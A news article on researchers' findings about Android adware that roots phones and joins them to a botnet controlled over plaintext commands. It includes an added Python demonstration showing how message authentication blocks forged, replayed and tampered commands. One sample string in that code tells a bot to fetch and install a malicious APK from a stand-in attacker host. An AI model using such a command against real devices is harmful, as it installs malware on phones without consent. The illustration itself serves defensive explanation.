Android botnet

A Chinese advertising company has infected and ‘completely’ hijacked what is likely hundreds of thousands of Android handsets, security researchers say.

The attack was built so carelessly that it exposes the resulting global botnet to easy hijacking and opens infected handsets to total compromise by any other malware.

FireEye researchers Yulong Zhang, Zhaofeng Chen, and Yong Kang say Chinese app advertising company Xinyinhe is behind the attack.

They did not put a number on the infected devices, but Xinyinhe claims to have ‘customers’ in 50 countries and, as of November, a valuation of $100 million after receiving some $20 million in seed funding in 2013.

The team says the campaign builds its ‘customer’ base by tricking users into installing malware that gains root access on some 308 handset models running virtually every version of Android from Gingerbread (2.3.4) to the latest stable Lollipop build (5.1.1).

These victims are enrolled into a “very large” global botnet that, remarkably, uses plain text for its command-and-control (C2) traffic, which allows “anyone” to hijack it.
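The hijacking risk described above comes down to the bot acting on any command it can parse, with nothing tying the command to the real operator. The following is an added illustration, not Xinyinhe’s protocol or the FireEye researchers’ code: the message format (`CMD <action> <args>`), the hostnames, the keys and the sequence-number scheme are all assumptions. It contrasts a bot that trusts plaintext commands with one that requires a keyed MAC and a monotonically increasing sequence number, and shows which injected messages each one accepts.

```python
"""Plaintext, unauthenticated C2 versus authenticated C2 (added illustration).

Not the adware's real protocol. Message format, hostnames and keys below are
constructed for the demonstration.
"""
import hashlib
import hmac
import secrets


def handle_plain(msg: bytes):
    """Plaintext bot: parse and act on any well-formed command it receives.

    Returns the (action, args) it would execute, or None if the message is
    malformed. There is no check of who sent it, which is the flaw.
    """
    fields = msg.decode("utf-8", "replace").split()
    if len(fields) < 2 or fields[0] != "CMD":
        return None
    return fields[1], tuple(fields[2:])


# --- Minimal fix: HMAC over the command plus a replay-resistant sequence number

def sign_command(key: bytes, seq: int, action: str, *args: str) -> bytes:
    """Operator side: build '<seq> <action> <args...>|<hex hmac-sha256>'."""
    body = f"{seq} {action} {' '.join(args)}".strip().encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"|" + tag


class AuthenticatedBot:
    """Bot side: accept a command only if the MAC verifies and seq is fresh."""

    def __init__(self, key: bytes):
        self.key = key
        self.last_seq = 0

    def handle(self, msg: bytes):
        body, sep, tag = msg.rpartition(b"|")
        if not sep:
            return None  # no tag at all
        expected = hmac.new(self.key, body, hashlib.sha256).hexdigest().encode()
        if not hmac.compare_digest(expected, tag):
            return None  # forged or tampered message
        fields = body.decode("utf-8", "replace").split()
        if len(fields) < 2:
            return None
        try:
            seq = int(fields[0])
        except ValueError:
            return None
        if seq <= self.last_seq:
            return None  # replay of an earlier (genuine) command
        self.last_seq = seq
        return fields[1], tuple(fields[2:])


def demo() -> dict:
    """Run both bots against operator and hijacker traffic (all constructed)."""
    operator_key = secrets.token_bytes(32)
    hijacker_key = secrets.token_bytes(32)  # hijacker never learns operator_key
    results = {}

    # 1. Plaintext bot: a hijacker who can reach the C2 channel just speaks the format.
    hijack = b"CMD install http://hijacker.example/evil.apk"
    results["plaintext_accepts_hijack"] = handle_plain(hijack) is not None

    # 2. Authenticated bot: genuine command is accepted once.
    bot = AuthenticatedBot(operator_key)
    genuine = sign_command(operator_key, 1, "install", "http://operator.example/pkg.apk")
    results["auth_accepts_operator"] = bot.handle(genuine) == (
        "install", ("http://operator.example/pkg.apk",))

    # 3. Forged with the wrong key: MAC fails.
    forged = sign_command(hijacker_key, 2, "install", "http://hijacker.example/evil.apk")
    results["auth_rejects_forgery"] = bot.handle(forged) is None

    # 4. Replaying the captured genuine message: seq is not fresh.
    results["auth_rejects_replay"] = bot.handle(genuine) is None

    # 5. Rewriting the URL inside a captured genuine message: MAC no longer matches.
    tampered = genuine.replace(b"operator.example", b"hijacker.example")
    results["auth_rejects_tamper"] = bot.handle(tampered) is None
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The point of the example is authentication, not secrecy: a MAC key baked into every infected APK is only as secret as the APK, so in practice command signing with a key the clients never hold (public-key signatures over TLS) is what separates an operator from anyone else on the path. The adware described in the article had neither.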

Once a handset is infected, the malware installs legitimate but booby-trapped applications without user consent, automatically clicking through installation and permission prompts.

It installs a backdoor, maintains persistence on the device, and leaves the root access it obtains open to abuse by third-party malware.

“This is a worldwide, spreading malicious adware family with a high threat, likely controlled by a Chinese organisation,” the researchers say.

“Any affected user may have inadvertently compromised their user credentials for some online services [and should] change their passwords for any online services such as iTunes, online banking, email, and work accounts.”

The trio says the attackers were so careless that the infected apps, which have “full control” root access to the phone, let any other malware on the device share that privileged access.

This means authors of malware that could not otherwise gain root could piggyback on the infection to obtain root privileges, hijack the devices, and inflict “permanent damages”.

So far some 300 infected apps have been discovered, including repackaged versions of popular apps such as the Amazon app, Memory Booster, and Clean Master.

The adware uses “novel” and effective persistence and obfuscation techniques, such as installing system-level services and modifying the boot-time recovery-install script, the same mechanism used to flash new system images, so that it survives reboots and updates.

Zhang, Chen, and Kang say the attackers repackaged these popular apps with malicious logic that is continuously updated.
